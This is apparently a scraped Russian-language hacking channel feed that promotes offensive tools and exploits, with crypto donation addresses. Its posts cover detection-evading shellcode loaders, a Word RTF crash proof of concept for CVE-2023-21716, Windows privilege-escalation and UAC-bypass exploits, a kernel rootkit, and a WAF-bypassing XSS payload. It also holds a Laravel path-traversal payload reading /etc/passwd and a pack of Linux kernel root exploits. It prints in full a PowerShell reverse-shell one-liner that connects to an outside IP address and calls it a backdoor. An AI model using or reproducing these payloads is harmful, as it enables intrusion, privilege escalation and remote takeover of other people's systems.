RemoteShellcodeExec
Выполнение шелл-кода из удаленного bin-файла с помощью Winhttp.
Shellcodes are dead, long live fileless shellcodes.
*
Пока что 0/26 detections
download

использование setuid dos2unix позволяет выполнять запись произвольного файла от имени пользователя root.

Внимание !
через 10 минут опять понедельник.
Вот вам rootkit dog
😎

BurpSuite
*
man\tutor
Вдруг вы забыли

pic of day

8 марта вот вот настанет ! 😊

Поддержим проект ?)

BTC bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82
XMR 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k


#праздник

0-CLICK Microsoft Word RCE exploit
CVE-2023-21716 Python
PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

CVE-2023-21768 Local Privilege Escalation
Windows 11 22H2
POC exploit
*
usage:
Windows_AFD_LPE_CVE-2023-21768.exe <pid>
где <pid> это id процесса который нужно повысить до system

#windows #lpe

Offline создание администратора Windows 10? 😈
Ога
Всё через встроенные DLL-файлы offlinelsa и offlinesam. Официально, но не очень документировано.

OfflineAddAdmin2 (это новая версия)

Видео туториал

Круто !!! old school sniffing RJ45
берем крокодильчики
цепляем на витуху
погнали
Video

полезные нагрузки подъехали
payloads

PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно.
Тупо бэкдор!

usage:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Laravel Framework

Payload: //////////////////../../../../../../../../etc/passwd

UAC bypass for x64 Windows 7 - 11
Понятно
iscsicpl.exe уязвим к перехвату порядка поиска DLL при запуске 32-битного бинарного файла Microsoft на 64-битном хосте через SysWOW64.

Рубрика нам пишут
Black Angel is a Windows 11/10 x64 kernel mode rootkit. Rootkit can be loaded with enabled DSE while maintaining its full functionality.
link

bypass for the FortiWeb (Fortinet) WAF
usage:
"><iframe src=//14.rs>
то есть вместо стандартной полезной нагрузки XSS для выполнения js

pic of day

kernel-linux-factory
*
Удобно тем, что не нужно компилировать или настраивать среду, глянул какое ядро, запустил сплоет, получил по морде #root
*
в составе exploits для:
CVE-2016-9793
4-20-BPF-integer
CVE-2017-5123
CVE-2017-6074
CVE-2017-7308
CVE-2017-8890
CVE-2017-11176
CVE-2017-16995
CVE-2017-1000112
CVE-2018-5333
CVE-2019-9213 & CVE-2019-8956
CVE-2019-15666
CVE-2020-8835
CVE-2020-27194
CVE-2021-3156
CVE-2021-31440
CVE-2021-3490
CVE-2021-22555
CVE-2021-41073
CVE-2021-4154
CVE-2021-42008
CVE-2021-43267
CVE-2022-0185
CVE-2022-0847
CVE-2022-0995
CVE-2022-1015
CVE-2022-2588
CVE-2022-2639
CVE-2022-25636
CVE-2022-27666
CVE-2022-32250
CVE-2022-34918

download

#linux #exploits #kernel